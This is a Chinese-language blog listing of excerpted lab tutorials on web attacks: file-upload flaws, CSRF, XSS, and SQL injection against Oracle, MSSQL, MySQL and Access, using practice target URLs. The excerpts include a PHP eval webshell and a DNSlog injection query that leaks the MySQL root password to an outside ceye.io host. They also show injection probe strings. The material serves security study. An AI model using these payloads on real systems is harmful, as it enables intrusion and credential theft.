HackerScorpio 文件上传解析漏洞
文件上传解析漏洞<?php phpinfo();?><?php $a = '<?php @eval($_POST['a\'])?>Pass-01前端验证绕过1.php<?php phpinfo();?>该文件不允许上传,请上传.jpg|.png|.gif类型的文件,当前文件类型为:.php1.jpg抓包Content-Disposi
HackerScorpio CSRF跨站请求伪造
CSRF跨站请求伪造CSRF(Cross-site request forgery)跨站请求伪造:也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF
HackerScorpio DOM型XSS
DOM型XSSdocument.write() 可以接受UNICODE编码值转码地址:http://tool.oschina.net/encode一会儿会用到进入靶场http://120.203.13.75:6815/3/见框就插1.颜色#000000后有个存储型XSShttp://120.203.13.75:6815/3/dom
HackerScorpio 存储型XSS
存储型XSS存储型XSS (你提交的数据成功的实现了XSS,存入了数据库,别人访问这个页面的时候就会自动触发)持久型/存储型XSS:嵌入到web页面的恶意HTML会被存储到应用服务器端,简而言之就是会被存储到数据库,等用户在打开页面时,会继续执行恶意代码,能够持续的攻击用户;存储型XSS会出现在什么地方?任何可能插入数据库的地方比如:用户注册的时候留言板上传文件的文件名(管理员可见的)报错信息进入
HackerScorpio 反射型XSS
反射型XSSXSS拼接的是网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句(总结:xss就是拼接恶意的HTML)XSS我个人的理解是HTML代码注入。xss能做什么:盗取Cookie(用的最频繁的)获取内网ip获取浏览器保存的明文密码截取网页屏幕网页上的键盘记录怎么检测是否存在XSS?一般是想办法让浏览器弹窗(alert) 最经典的弹窗语句:<script&
HackerScorpio Oracle注入- 报错注入
Oracle注入- 报错注入select * from all_tables 查询出所有的表select * from user_tables 查询出当前用户的表select*from all_tab_columns 查询出所有的字段select*from user_tab_columns 查询出当前用户的字段因为DUAL只有一行,所以常量只返回一次。rownum=1 &n
HackerScorpio MSSQL注入 - 反弹注入
MSSQL注入 - 反弹注入 select name from master.dbo.sysdatabases 查询系统库dbo.sysobjects 查询系统表 (xtype='U')dbo.syscolumns 字段 (id= ) 指定idinsert into opendatasource('sqloledb','server=S
HackerScorpio MYSQL 注入 - Dnslog注入
MYSQL 注入 - Dnslog注入SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));SELECT LOAD_FILE(CONCAT(
HackerScorpio MySQL注入 - 全方位利用
MySQL注入 - 全方位利用在MySQL5.0版本之后,MySQL默认在数据库中存放着一个“information_schema”的数据库。进入靶场猫舍http://120.203.13.75:6815/?id=1http://120.203.13.75:6815/?id=1'http://120.203.13.75:6815/?id=1 and 1=1 http://120.
HackerScorpio Access注入 — 偏移注入
Access注入 — 偏移注入其实老师讲的是移位溢注我感觉移位溢注比偏移注入要好一些只知道表名,不知道字段列名,可以尝试一下移位溢注和偏移注入注入的表的字段列数一定要大于要查询的表的字段列数如果MYSQL小于5.0的情况下所具备的条件和ACCESS一样,也可以使用此方法注入,如果是MYSQL大于5.0的版本,使用此方法可以省去获得列名的步骤。进入靶场http://120.203.13.75:800